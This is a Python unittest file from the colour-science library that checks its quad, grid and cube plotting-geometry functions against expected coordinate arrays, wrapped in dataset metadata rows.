| 0.714286
| 0.265487
| 0.424779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007246
| 0.142857
| 161
| 6
| 40
| 26.833333
| 0.811594
| 0.279503
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
773e493c6d46dde519a464cd0f87e14a3e27a513
| 35,079
|
py
|
Python
|
colour/plotting/tests/test_geometry.py
|
MaxSchambach/colour
|
3f3685d616fda4be58cec20bc1e16194805d7e2d
|
[
"BSD-3-Clause"
] | null | null | null |
colour/plotting/tests/test_geometry.py
|
MaxSchambach/colour
|
3f3685d616fda4be58cec20bc1e16194805d7e2d
|
[
"BSD-3-Clause"
] | null | null | null |
colour/plotting/tests/test_geometry.py
|
MaxSchambach/colour
|
3f3685d616fda4be58cec20bc1e16194805d7e2d
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Defines unit tests for :mod:`colour.plotting.geometry` module.
"""
from __future__ import division, unicode_literals
import numpy as np
import unittest
from colour.plotting import quad, grid, cube
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2019 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = 'colour-developers@colour-science.org'
__status__ = 'Production'
__all__ = ['TestQuad', 'TestGrid', 'TestCube']
class TestQuad(unittest.TestCase):
"""
Defines :func:`colour.plotting.geometry.quad` definition unit tests
methods.
"""
def test_quad(self):
"""
Tests :func:`colour.plotting.geometry.quad` definition.
"""
np.testing.assert_almost_equal(
quad(),
np.array([[0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0]]),
decimal=7)
np.testing.assert_almost_equal(
quad('xz'),
np.array([[0, 0, 0], [1, 0, 0], [1, 0, 1], [0, 0, 1]]),
decimal=7)
np.testing.assert_almost_equal(
quad('yz'),
np.array([[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 0, 1]]),
decimal=7)
np.testing.assert_almost_equal(
quad(
'xy',
origin=np.array([0.2, 0.4]),
width=0.2,
height=0.4,
depth=0.6),
np.array([[0.2, 0.4, 0.6], [0.4, 0.4, 0.6], [0.4, 0.8, 0.6],
[0.2, 0.8, 0.6]]),
decimal=7)
np.testing.assert_almost_equal(
quad(
'xy',
origin=np.array([-0.2, -0.4]),
width=-0.2,
height=-0.4,
depth=-0.6),
np.array([[-0.2, -0.4, -0.6], [-0.4, -0.4, -0.6],
[-0.4, -0.8, -0.6], [-0.2, -0.8, -0.6]]),
decimal=7)
self.assertRaises(ValueError, lambda: quad(plane='Undefined'))
class TestGrid(unittest.TestCase):
"""
Defines :func:`colour.plotting.geometry.grid` definition unit tests
methods.
"""
def test_grid(self):
"""
Tests :func:`colour.plotting.geometry.grid` definition.
"""
np.testing.assert_almost_equal(
grid(),
np.array([[[0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0]]]),
decimal=7)
np.testing.assert_almost_equal(
grid('xz'),
np.array([[[0, 0, 0], [1, 0, 0], [1, 0, 1], [0, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
grid('yz'),
np.array([[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
grid('xy',
origin=np.array([0.2, 0.4]),
width=0.2,
height=0.4,
depth=0.6,
width_segments=3,
height_segments=3),
np.array(
[[[0.20000000, 0.40000000, 0.60000000],
[0.26666667, 0.40000000, 0.60000000],
[0.26666667, 0.53333333, 0.60000000],
[0.20000000, 0.53333333, 0.60000000]],
[[0.20000000, 0.53333333, 0.60000000],
[0.26666667, 0.53333333, 0.60000000],
[0.26666667, 0.66666667, 0.60000000],
[0.20000000, 0.66666667, 0.60000000]],
[[0.20000000, 0.66666667, 0.60000000],
[0.26666667, 0.66666667, 0.60000000],
[0.26666667, 0.80000000, 0.60000000],
[0.20000000, 0.80000000, 0.60000000]],
[[0.26666667, 0.40000000, 0.60000000],
[0.33333333, 0.40000000, 0.60000000],
[0.33333333, 0.53333333, 0.60000000],
[0.26666667, 0.53333333, 0.60000000]],
[[0.26666667, 0.53333333, 0.60000000],
[0.33333333, 0.53333333, 0.60000000],
[0.33333333, 0.66666667, 0.60000000],
[0.26666667, 0.66666667, 0.60000000]],
[[0.26666667, 0.66666667, 0.60000000],
[0.33333333, 0.66666667, 0.60000000],
[0.33333333, 0.80000000, 0.60000000],
[0.26666667, 0.80000000, 0.60000000]],
[[0.33333333, 0.40000000, 0.60000000],
[0.40000000, 0.40000000, 0.60000000],
[0.40000000, 0.53333333, 0.60000000],
[0.33333333, 0.53333333, 0.60000000]],
[[0.33333333, 0.53333333, 0.60000000],
[0.40000000, 0.53333333, 0.60000000],
[0.40000000, 0.66666667, 0.60000000],
[0.33333333, 0.66666667, 0.60000000]],
[[0.33333333, 0.66666667, 0.60000000],
[0.40000000, 0.66666667, 0.60000000],
[0.40000000, 0.80000000, 0.60000000],
[0.33333333, 0.80000000, 0.60000000]]]
),
decimal=7) # yapf: disable
np.testing.assert_almost_equal(
grid('xy',
origin=np.array([-0.2, -0.4]),
width=-0.2,
height=-0.4,
depth=-0.6,
width_segments=3,
height_segments=3),
np.array(
[[[-0.20000000, -0.40000000, -0.60000000],
[-0.26666667, -0.40000000, -0.60000000],
[-0.26666667, -0.53333333, -0.60000000],
[-0.20000000, -0.53333333, -0.60000000]],
[[-0.20000000, -0.53333333, -0.60000000],
[-0.26666667, -0.53333333, -0.60000000],
[-0.26666667, -0.66666667, -0.60000000],
[-0.20000000, -0.66666667, -0.60000000]],
[[-0.20000000, -0.66666667, -0.60000000],
[-0.26666667, -0.66666667, -0.60000000],
[-0.26666667, -0.80000000, -0.60000000],
[-0.20000000, -0.80000000, -0.60000000]],
[[-0.26666667, -0.40000000, -0.60000000],
[-0.33333333, -0.40000000, -0.60000000],
[-0.33333333, -0.53333333, -0.60000000],
[-0.26666667, -0.53333333, -0.60000000]],
[[-0.26666667, -0.53333333, -0.60000000],
[-0.33333333, -0.53333333, -0.60000000],
[-0.33333333, -0.66666667, -0.60000000],
[-0.26666667, -0.66666667, -0.60000000]],
[[-0.26666667, -0.66666667, -0.60000000],
[-0.33333333, -0.66666667, -0.60000000],
[-0.33333333, -0.80000000, -0.60000000],
[-0.26666667, -0.80000000, -0.60000000]],
[[-0.33333333, -0.40000000, -0.60000000],
[-0.40000000, -0.40000000, -0.60000000],
[-0.40000000, -0.53333333, -0.60000000],
[-0.33333333, -0.53333333, -0.60000000]],
[[-0.33333333, -0.53333333, -0.60000000],
[-0.40000000, -0.53333333, -0.60000000],
[-0.40000000, -0.66666667, -0.60000000],
[-0.33333333, -0.66666667, -0.60000000]],
[[-0.33333333, -0.66666667, -0.60000000],
[-0.40000000, -0.66666667, -0.60000000],
[-0.40000000, -0.80000000, -0.60000000],
[-0.33333333, -0.80000000, -0.60000000]]]
),
decimal=7) # yapf: disable
class TestCube(unittest.TestCase):
"""
Defines :func:`colour.plotting.geometry.cube` definition unit tests
methods.
"""
def test_cube(self):
"""
Tests :func:`colour.plotting.geometry.cube` definition.
"""
np.testing.assert_almost_equal(
cube(),
np.array([
[[0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0]],
[[0, 0, 1], [1, 0, 1], [1, 1, 1], [0, 1, 1]],
[[0, 0, 0], [1, 0, 0], [1, 0, 1], [0, 0, 1]],
[[0, 1, 0], [1, 1, 0], [1, 1, 1], [0, 1, 1]],
[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 0, 1]],
[[1, 0, 0], [1, 1, 0], [1, 1, 1], [1, 0, 1]],
]),
decimal=7)
np.testing.assert_almost_equal(
cube(('+x', )),
np.array([[[1, 0, 0], [1, 1, 0], [1, 1, 1], [1, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('-x', )),
np.array([[[0, 0, 0], [0, 1, 0], [0, 1, 1], [0, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('+y', )),
np.array([[[0, 1, 0], [1, 1, 0], [1, 1, 1], [0, 1, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('-y', )),
np.array([[[0, 0, 0], [1, 0, 0], [1, 0, 1], [0, 0, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('+z', )),
np.array([[[0, 0, 1], [1, 0, 1], [1, 1, 1], [0, 1, 1]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(('-z', )),
np.array([[[0, 0, 0], [1, 0, 0], [1, 1, 0], [0, 1, 0]]]),
decimal=7)
np.testing.assert_almost_equal(
cube(origin=np.array([0.2, 0.4, 0.6]),
width=0.2,
height=0.4,
depth=0.6,
width_segments=3,
height_segments=3,
depth_segments=3),
np.array(
[[[0.20000000, 0.60000000, 0.40000000],
[0.26666667, 0.60000000, 0.40000000],
[0.26666667, 0.80000000, 0.40000000],
[0.20000000, 0.80000000, 0.40000000]],
[[0.20000000, 0.80000000, 0.40000000],
[0.26666667, 0.80000000, 0.40000000],
[0.26666667, 1.00000000, 0.40000000],
[0.20000000, 1.00000000, 0.40000000]],
[[0.20000000, 1.00000000, 0.40000000],
[0.26666667, 1.00000000, 0.40000000],
[0.26666667, 1.20000000, 0.40000000],
[0.20000000, 1.20000000, 0.40000000]],
[[0.26666667, 0.60000000, 0.40000000],
[0.33333333, 0.60000000, 0.40000000],
[0.33333333, 0.80000000, 0.40000000],
[0.26666667, 0.80000000, 0.40000000]],
[[0.26666667, 0.80000000, 0.40000000],
[0.33333333, 0.80000000, 0.40000000],
[0.33333333, 1.00000000, 0.40000000],
[0.26666667, 1.00000000, 0.40000000]],
[[0.26666667, 1.00000000, 0.40000000],
[0.33333333, 1.00000000, 0.40000000],
[0.33333333, 1.20000000, 0.40000000],
[0.26666667, 1.20000000, 0.40000000]],
[[0.33333333, 0.60000000, 0.40000000],
[0.40000000, 0.60000000, 0.40000000],
[0.40000000, 0.80000000, 0.40000000],
[0.33333333, 0.80000000, 0.40000000]],
[[0.33333333, 0.80000000, 0.40000000],
[0.40000000, 0.80000000, 0.40000000],
[0.40000000, 1.00000000, 0.40000000],
[0.33333333, 1.00000000, 0.40000000]],
[[0.33333333, 1.00000000, 0.40000000],
[0.40000000, 1.00000000, 0.40000000],
[0.40000000, 1.20000000, 0.40000000],
[0.33333333, 1.20000000, 0.40000000]],
[[0.20000000, 0.60000000, 0.80000000],
[0.26666667, 0.60000000, 0.80000000],
[0.26666667, 0.80000000, 0.80000000],
[0.20000000, 0.80000000, 0.80000000]],
[[0.20000000, 0.80000000, 0.80000000],
[0.26666667, 0.80000000, 0.80000000],
[0.26666667, 1.00000000, 0.80000000],
[0.20000000, 1.00000000, 0.80000000]],
[[0.20000000, 1.00000000, 0.80000000],
[0.26666667, 1.00000000, 0.80000000],
[0.26666667, 1.20000000, 0.80000000],
[0.20000000, 1.20000000, 0.80000000]],
[[0.26666667, 0.60000000, 0.80000000],
[0.33333333, 0.60000000, 0.80000000],
[0.33333333, 0.80000000, 0.80000000],
[0.26666667, 0.80000000, 0.80000000]],
[[0.26666667, 0.80000000, 0.80000000],
[0.33333333, 0.80000000, 0.80000000],
[0.33333333, 1.00000000, 0.80000000],
[0.26666667, 1.00000000, 0.80000000]],
[[0.26666667, 1.00000000, 0.80000000],
[0.33333333, 1.00000000, 0.80000000],
[0.33333333, 1.20000000, 0.80000000],
[0.26666667, 1.20000000, 0.80000000]],
[[0.33333333, 0.60000000, 0.80000000],
[0.40000000, 0.60000000, 0.80000000],
[0.40000000, 0.80000000, 0.80000000],
[0.33333333, 0.80000000, 0.80000000]],
[[0.33333333, 0.80000000, 0.80000000],
[0.40000000, 0.80000000, 0.80000000],
[0.40000000, 1.00000000, 0.80000000],
[0.33333333, 1.00000000, 0.80000000]],
[[0.33333333, 1.00000000, 0.80000000],
[0.40000000, 1.00000000, 0.80000000],
[0.40000000, 1.20000000, 0.80000000],
[0.33333333, 1.20000000, 0.80000000]],
[[0.20000000, 0.60000000, 0.40000000],
[0.26666667, 0.60000000, 0.40000000],
[0.26666667, 0.60000000, 0.53333333],
[0.20000000, 0.60000000, 0.53333333]],
[[0.20000000, 0.60000000, 0.53333333],
[0.26666667, 0.60000000, 0.53333333],
[0.26666667, 0.60000000, 0.66666667],
[0.20000000, 0.60000000, 0.66666667]],
[[0.20000000, 0.60000000, 0.66666667],
[0.26666667, 0.60000000, 0.66666667],
[0.26666667, 0.60000000, 0.80000000],
[0.20000000, 0.60000000, 0.80000000]],
[[0.26666667, 0.60000000, 0.40000000],
[0.33333333, 0.60000000, 0.40000000],
[0.33333333, 0.60000000, 0.53333333],
[0.26666667, 0.60000000, 0.53333333]],
[[0.26666667, 0.60000000, 0.53333333],
[0.33333333, 0.60000000, 0.53333333],
[0.33333333, 0.60000000, 0.66666667],
[0.26666667, 0.60000000, 0.66666667]],
[[0.26666667, 0.60000000, 0.66666667],
[0.33333333, 0.60000000, 0.66666667],
[0.33333333, 0.60000000, 0.80000000],
[0.26666667, 0.60000000, 0.80000000]],
[[0.33333333, 0.60000000, 0.40000000],
[0.40000000, 0.60000000, 0.40000000],
[0.40000000, 0.60000000, 0.53333333],
[0.33333333, 0.60000000, 0.53333333]],
[[0.33333333, 0.60000000, 0.53333333],
[0.40000000, 0.60000000, 0.53333333],
[0.40000000, 0.60000000, 0.66666667],
[0.33333333, 0.60000000, 0.66666667]],
[[0.33333333, 0.60000000, 0.66666667],
[0.40000000, 0.60000000, 0.66666667],
[0.40000000, 0.60000000, 0.80000000],
[0.33333333, 0.60000000, 0.80000000]],
[[0.20000000, 1.20000000, 0.40000000],
[0.26666667, 1.20000000, 0.40000000],
[0.26666667, 1.20000000, 0.53333333],
[0.20000000, 1.20000000, 0.53333333]],
[[0.20000000, 1.20000000, 0.53333333],
[0.26666667, 1.20000000, 0.53333333],
[0.26666667, 1.20000000, 0.66666667],
[0.20000000, 1.20000000, 0.66666667]],
[[0.20000000, 1.20000000, 0.66666667],
[0.26666667, 1.20000000, 0.66666667],
[0.26666667, 1.20000000, 0.80000000],
[0.20000000, 1.20000000, 0.80000000]],
[[0.26666667, 1.20000000, 0.40000000],
[0.33333333, 1.20000000, 0.40000000],
[0.33333333, 1.20000000, 0.53333333],
[0.26666667, 1.20000000, 0.53333333]],
[[0.26666667, 1.20000000, 0.53333333],
[0.33333333, 1.20000000, 0.53333333],
[0.33333333, 1.20000000, 0.66666667],
[0.26666667, 1.20000000, 0.66666667]],
[[0.26666667, 1.20000000, 0.66666667],
[0.33333333, 1.20000000, 0.66666667],
[0.33333333, 1.20000000, 0.80000000],
[0.26666667, 1.20000000, 0.80000000]],
[[0.33333333, 1.20000000, 0.40000000],
[0.40000000, 1.20000000, 0.40000000],
[0.40000000, 1.20000000, 0.53333333],
[0.33333333, 1.20000000, 0.53333333]],
[[0.33333333, 1.20000000, 0.53333333],
[0.40000000, 1.20000000, 0.53333333],
[0.40000000, 1.20000000, 0.66666667],
[0.33333333, 1.20000000, 0.66666667]],
[[0.33333333, 1.20000000, 0.66666667],
[0.40000000, 1.20000000, 0.66666667],
[0.40000000, 1.20000000, 0.80000000],
[0.33333333, 1.20000000, 0.80000000]],
[[0.20000000, 0.60000000, 0.40000000],
[0.20000000, 0.80000000, 0.40000000],
[0.20000000, 0.80000000, 0.53333333],
[0.20000000, 0.60000000, 0.53333333]],
[[0.20000000, 0.60000000, 0.53333333],
[0.20000000, 0.80000000, 0.53333333],
[0.20000000, 0.80000000, 0.66666667],
[0.20000000, 0.60000000, 0.66666667]],
[[0.20000000, 0.60000000, 0.66666667],
[0.20000000, 0.80000000, 0.66666667],
[0.20000000, 0.80000000, 0.80000000],
[0.20000000, 0.60000000, 0.80000000]],
[[0.20000000, 0.80000000, 0.40000000],
[0.20000000, 1.00000000, 0.40000000],
[0.20000000, 1.00000000, 0.53333333],
[0.20000000, 0.80000000, 0.53333333]],
[[0.20000000, 0.80000000, 0.53333333],
[0.20000000, 1.00000000, 0.53333333],
[0.20000000, 1.00000000, 0.66666667],
[0.20000000, 0.80000000, 0.66666667]],
[[0.20000000, 0.80000000, 0.66666667],
[0.20000000, 1.00000000, 0.66666667],
[0.20000000, 1.00000000, 0.80000000],
[0.20000000, 0.80000000, 0.80000000]],
[[0.20000000, 1.00000000, 0.40000000],
[0.20000000, 1.20000000, 0.40000000],
[0.20000000, 1.20000000, 0.53333333],
[0.20000000, 1.00000000, 0.53333333]],
[[0.20000000, 1.00000000, 0.53333333],
[0.20000000, 1.20000000, 0.53333333],
[0.20000000, 1.20000000, 0.66666667],
[0.20000000, 1.00000000, 0.66666667]],
[[0.20000000, 1.00000000, 0.66666667],
[0.20000000, 1.20000000, 0.66666667],
[0.20000000, 1.20000000, 0.80000000],
[0.20000000, 1.00000000, 0.80000000]],
[[0.40000000, 0.60000000, 0.40000000],
[0.40000000, 0.80000000, 0.40000000],
[0.40000000, 0.80000000, 0.53333333],
[0.40000000, 0.60000000, 0.53333333]],
[[0.40000000, 0.60000000, 0.53333333],
[0.40000000, 0.80000000, 0.53333333],
[0.40000000, 0.80000000, 0.66666667],
[0.40000000, 0.60000000, 0.66666667]],
[[0.40000000, 0.60000000, 0.66666667],
[0.40000000, 0.80000000, 0.66666667],
[0.40000000, 0.80000000, 0.80000000],
[0.40000000, 0.60000000, 0.80000000]],
[[0.40000000, 0.80000000, 0.40000000],
[0.40000000, 1.00000000, 0.40000000],
[0.40000000, 1.00000000, 0.53333333],
[0.40000000, 0.80000000, 0.53333333]],
[[0.40000000, 0.80000000, 0.53333333],
[0.40000000, 1.00000000, 0.53333333],
[0.40000000, 1.00000000, 0.66666667],
[0.40000000, 0.80000000, 0.66666667]],
[[0.40000000, 0.80000000, 0.66666667],
[0.40000000, 1.00000000, 0.66666667],
[0.40000000, 1.00000000, 0.80000000],
[0.40000000, 0.80000000, 0.80000000]],
[[0.40000000, 1.00000000, 0.40000000],
[0.40000000, 1.20000000, 0.40000000],
[0.40000000, 1.20000000, 0.53333333],
[0.40000000, 1.00000000, 0.53333333]],
[[0.40000000, 1.00000000, 0.53333333],
[0.40000000, 1.20000000, 0.53333333],
[0.40000000, 1.20000000, 0.66666667],
[0.40000000, 1.00000000, 0.66666667]],
[[0.40000000, 1.00000000, 0.66666667],
[0.40000000, 1.20000000, 0.66666667],
[0.40000000, 1.20000000, 0.80000000],
[0.40000000, 1.00000000, 0.80000000]]]
),
decimal=7) # yapf: disable
np.testing.assert_almost_equal(
cube(origin=np.array([-0.2, -0.4, -0.6]),
width=-0.2,
height=-0.4,
depth=-0.6,
width_segments=3,
height_segments=3,
depth_segments=3),
np.array(
[[[-0.20000000, -0.60000000, -0.40000000],
[-0.26666667, -0.60000000, -0.40000000],
[-0.26666667, -0.80000000, -0.40000000],
[-0.20000000, -0.80000000, -0.40000000]],
[[-0.20000000, -0.80000000, -0.40000000],
[-0.26666667, -0.80000000, -0.40000000],
[-0.26666667, -1.00000000, -0.40000000],
[-0.20000000, -1.00000000, -0.40000000]],
[[-0.20000000, -1.00000000, -0.40000000],
[-0.26666667, -1.00000000, -0.40000000],
[-0.26666667, -1.20000000, -0.40000000],
[-0.20000000, -1.20000000, -0.40000000]],
[[-0.26666667, -0.60000000, -0.40000000],
[-0.33333333, -0.60000000, -0.40000000],
[-0.33333333, -0.80000000, -0.40000000],
[-0.26666667, -0.80000000, -0.40000000]],
[[-0.26666667, -0.80000000, -0.40000000],
[-0.33333333, -0.80000000, -0.40000000],
[-0.33333333, -1.00000000, -0.40000000],
[-0.26666667, -1.00000000, -0.40000000]],
[[-0.26666667, -1.00000000, -0.40000000],
[-0.33333333, -1.00000000, -0.40000000],
[-0.33333333, -1.20000000, -0.40000000],
[-0.26666667, -1.20000000, -0.40000000]],
[[-0.33333333, -0.60000000, -0.40000000],
[-0.40000000, -0.60000000, -0.40000000],
[-0.40000000, -0.80000000, -0.40000000],
[-0.33333333, -0.80000000, -0.40000000]],
[[-0.33333333, -0.80000000, -0.40000000],
[-0.40000000, -0.80000000, -0.40000000],
[-0.40000000, -1.00000000, -0.40000000],
[-0.33333333, -1.00000000, -0.40000000]],
[[-0.33333333, -1.00000000, -0.40000000],
[-0.40000000, -1.00000000, -0.40000000],
[-0.40000000, -1.20000000, -0.40000000],
[-0.33333333, -1.20000000, -0.40000000]],
[[-0.20000000, -0.60000000, -0.80000000],
[-0.26666667, -0.60000000, -0.80000000],
[-0.26666667, -0.80000000, -0.80000000],
[-0.20000000, -0.80000000, -0.80000000]],
[[-0.20000000, -0.80000000, -0.80000000],
[-0.26666667, -0.80000000, -0.80000000],
[-0.26666667, -1.00000000, -0.80000000],
[-0.20000000, -1.00000000, -0.80000000]],
[[-0.20000000, -1.00000000, -0.80000000],
[-0.26666667, -1.00000000, -0.80000000],
[-0.26666667, -1.20000000, -0.80000000],
[-0.20000000, -1.20000000, -0.80000000]],
[[-0.26666667, -0.60000000, -0.80000000],
[-0.33333333, -0.60000000, -0.80000000],
[-0.33333333, -0.80000000, -0.80000000],
[-0.26666667, -0.80000000, -0.80000000]],
[[-0.26666667, -0.80000000, -0.80000000],
[-0.33333333, -0.80000000, -0.80000000],
[-0.33333333, -1.00000000, -0.80000000],
[-0.26666667, -1.00000000, -0.80000000]],
[[-0.26666667, -1.00000000, -0.80000000],
[-0.33333333, -1.00000000, -0.80000000],
[-0.33333333, -1.20000000, -0.80000000],
[-0.26666667, -1.20000000, -0.80000000]],
[[-0.33333333, -0.60000000, -0.80000000],
[-0.40000000, -0.60000000, -0.80000000],
[-0.40000000, -0.80000000, -0.80000000],
[-0.33333333, -0.80000000, -0.80000000]],
[[-0.33333333, -0.80000000, -0.80000000],
[-0.40000000, -0.80000000, -0.80000000],
[-0.40000000, -1.00000000, -0.80000000],
[-0.33333333, -1.00000000, -0.80000000]],
[[-0.33333333, -1.00000000, -0.80000000],
[-0.40000000, -1.00000000, -0.80000000],
[-0.40000000, -1.20000000, -0.80000000],
[-0.33333333, -1.20000000, -0.80000000]],
[[-0.20000000, -0.60000000, -0.40000000],
[-0.26666667, -0.60000000, -0.40000000],
[-0.26666667, -0.60000000, -0.53333333],
[-0.20000000, -0.60000000, -0.53333333]],
[[-0.20000000, -0.60000000, -0.53333333],
[-0.26666667, -0.60000000, -0.53333333],
[-0.26666667, -0.60000000, -0.66666667],
[-0.20000000, -0.60000000, -0.66666667]],
[[-0.20000000, -0.60000000, -0.66666667],
[-0.26666667, -0.60000000, -0.66666667],
[-0.26666667, -0.60000000, -0.80000000],
[-0.20000000, -0.60000000, -0.80000000]],
[[-0.26666667, -0.60000000, -0.40000000],
[-0.33333333, -0.60000000, -0.40000000],
[-0.33333333, -0.60000000, -0.53333333],
[-0.26666667, -0.60000000, -0.53333333]],
[[-0.26666667, -0.60000000, -0.53333333],
[-0.33333333, -0.60000000, -0.53333333],
[-0.33333333, -0.60000000, -0.66666667],
[-0.26666667, -0.60000000, -0.66666667]],
[[-0.26666667, -0.60000000, -0.66666667],
[-0.33333333, -0.60000000, -0.66666667],
[-0.33333333, -0.60000000, -0.80000000],
[-0.26666667, -0.60000000, -0.80000000]],
[[-0.33333333, -0.60000000, -0.40000000],
[-0.40000000, -0.60000000, -0.40000000],
[-0.40000000, -0.60000000, -0.53333333],
[-0.33333333, -0.60000000, -0.53333333]],
[[-0.33333333, -0.60000000, -0.53333333],
[-0.40000000, -0.60000000, -0.53333333],
[-0.40000000, -0.60000000, -0.66666667],
[-0.33333333, -0.60000000, -0.66666667]],
[[-0.33333333, -0.60000000, -0.66666667],
[-0.40000000, -0.60000000, -0.66666667],
[-0.40000000, -0.60000000, -0.80000000],
[-0.33333333, -0.60000000, -0.80000000]],
[[-0.20000000, -1.20000000, -0.40000000],
[-0.26666667, -1.20000000, -0.40000000],
[-0.26666667, -1.20000000, -0.53333333],
[-0.20000000, -1.20000000, -0.53333333]],
[[-0.20000000, -1.20000000, -0.53333333],
[-0.26666667, -1.20000000, -0.53333333],
[-0.26666667, -1.20000000, -0.66666667],
[-0.20000000, -1.20000000, -0.66666667]],
[[-0.20000000, -1.20000000, -0.66666667],
[-0.26666667, -1.20000000, -0.66666667],
[-0.26666667, -1.20000000, -0.80000000],
[-0.20000000, -1.20000000, -0.80000000]],
[[-0.26666667, -1.20000000, -0.40000000],
[-0.33333333, -1.20000000, -0.40000000],
[-0.33333333, -1.20000000, -0.53333333],
[-0.26666667, -1.20000000, -0.53333333]],
[[-0.26666667, -1.20000000, -0.53333333],
[-0.33333333, -1.20000000, -0.53333333],
[-0.33333333, -1.20000000, -0.66666667],
[-0.26666667, -1.20000000, -0.66666667]],
[[-0.26666667, -1.20000000, -0.66666667],
[-0.33333333, -1.20000000, -0.66666667],
[-0.33333333, -1.20000000, -0.80000000],
[-0.26666667, -1.20000000, -0.80000000]],
[[-0.33333333, -1.20000000, -0.40000000],
[-0.40000000, -1.20000000, -0.40000000],
[-0.40000000, -1.20000000, -0.53333333],
[-0.33333333, -1.20000000, -0.53333333]],
[[-0.33333333, -1.20000000, -0.53333333],
[-0.40000000, -1.20000000, -0.53333333],
[-0.40000000, -1.20000000, -0.66666667],
[-0.33333333, -1.20000000, -0.66666667]],
[[-0.33333333, -1.20000000, -0.66666667],
[-0.40000000, -1.20000000, -0.66666667],
[-0.40000000, -1.20000000, -0.80000000],
[-0.33333333, -1.20000000, -0.80000000]],
[[-0.20000000, -0.60000000, -0.40000000],
[-0.20000000, -0.80000000, -0.40000000],
[-0.20000000, -0.80000000, -0.53333333],
[-0.20000000, -0.60000000, -0.53333333]],
[[-0.20000000, -0.60000000, -0.53333333],
[-0.20000000, -0.80000000, -0.53333333],
[-0.20000000, -0.80000000, -0.66666667],
[-0.20000000, -0.60000000, -0.66666667]],
[[-0.20000000, -0.60000000, -0.66666667],
[-0.20000000, -0.80000000, -0.66666667],
[-0.20000000, -0.80000000, -0.80000000],
[-0.20000000, -0.60000000, -0.80000000]],
[[-0.20000000, -0.80000000, -0.40000000],
[-0.20000000, -1.00000000, -0.40000000],
[-0.20000000, -1.00000000, -0.53333333],
[-0.20000000, -0.80000000, -0.53333333]],
[[-0.20000000, -0.80000000, -0.53333333],
[-0.20000000, -1.00000000, -0.53333333],
[-0.20000000, -1.00000000, -0.66666667],
[-0.20000000, -0.80000000, -0.66666667]],
[[-0.20000000, -0.80000000, -0.66666667],
[-0.20000000, -1.00000000, -0.66666667],
[-0.20000000, -1.00000000, -0.80000000],
[-0.20000000, -0.80000000, -0.80000000]],
[[-0.20000000, -1.00000000, -0.40000000],
[-0.20000000, -1.20000000, -0.40000000],
[-0.20000000, -1.20000000, -0.53333333],
[-0.20000000, -1.00000000, -0.53333333]],
[[-0.20000000, -1.00000000, -0.53333333],
[-0.20000000, -1.20000000, -0.53333333],
[-0.20000000, -1.20000000, -0.66666667],
[-0.20000000, -1.00000000, -0.66666667]],
[[-0.20000000, -1.00000000, -0.66666667],
[-0.20000000, -1.20000000, -0.66666667],
[-0.20000000, -1.20000000, -0.80000000],
[-0.20000000, -1.00000000, -0.80000000]],
[[-0.40000000, -0.60000000, -0.40000000],
[-0.40000000, -0.80000000, -0.40000000],
[-0.40000000, -0.80000000, -0.53333333],
[-0.40000000, -0.60000000, -0.53333333]],
[[-0.40000000, -0.60000000, -0.53333333],
[-0.40000000, -0.80000000, -0.53333333],
[-0.40000000, -0.80000000, -0.66666667],
[-0.40000000, -0.60000000, -0.66666667]],
[[-0.40000000, -0.60000000, -0.66666667],
[-0.40000000, -0.80000000, -0.66666667],
[-0.40000000, -0.80000000, -0.80000000],
[-0.40000000, -0.60000000, -0.80000000]],
[[-0.40000000, -0.80000000, -0.40000000],
[-0.40000000, -1.00000000, -0.40000000],
[-0.40000000, -1.00000000, -0.53333333],
[-0.40000000, -0.80000000, -0.53333333]],
[[-0.40000000, -0.80000000, -0.53333333],
[-0.40000000, -1.00000000, -0.53333333],
[-0.40000000, -1.00000000, -0.66666667],
[-0.40000000, -0.80000000, -0.66666667]],
[[-0.40000000, -0.80000000, -0.66666667],
[-0.40000000, -1.00000000, -0.66666667],
[-0.40000000, -1.00000000, -0.80000000],
[-0.40000000, -0.80000000, -0.80000000]],
[[-0.40000000, -1.00000000, -0.40000000],
[-0.40000000, -1.20000000, -0.40000000],
[-0.40000000, -1.20000000, -0.53333333],
[-0.40000000, -1.00000000, -0.53333333]],
[[-0.40000000, -1.00000000, -0.53333333],
[-0.40000000, -1.20000000, -0.53333333],
[-0.40000000, -1.20000000, -0.66666667],
[-0.40000000, -1.00000000, -0.66666667]],
[[-0.40000000, -1.00000000, -0.66666667],
[-0.40000000, -1.20000000, -0.66666667],
[-0.40000000, -1.20000000, -0.80000000],
[-0.40000000, -1.00000000, -0.80000000]]]
),
decimal=7) # yapf: disable
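# The assertion closing above (its opening lies earlier in the file) checks
# the computed quad coordinates against the expected array to 7 decimal
# places. A minimal sketch of the same kind of numpy.testing call, with
# hypothetical arrays `actual` and `expected`:
#
#   import numpy as np
#   np.testing.assert_almost_equal(actual, expected, decimal=7)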
if __name__ == '__main__':
unittest.main()
| 49.476728
| 78
| 0.461416
| 3,784
| 35,079
| 4.253171
| 0.026163
| 0.147633
| 0.140425
| 0.069343
| 0.968063
| 0.968063
| 0.94644
| 0.937306
| 0.936809
| 0.936809
| 0
| 0.625364
| 0.362952
| 35,079
| 708
| 79
| 49.54661
| 0.094823
